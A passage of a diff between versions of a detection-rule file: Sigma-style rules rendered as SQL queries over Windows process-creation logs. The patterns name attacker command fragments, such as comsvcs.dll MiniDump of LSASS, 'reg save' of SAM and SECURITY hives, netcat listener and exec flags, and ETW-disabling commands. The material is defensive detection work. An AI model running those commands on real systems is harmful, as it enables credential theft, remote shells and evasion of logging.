"fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR 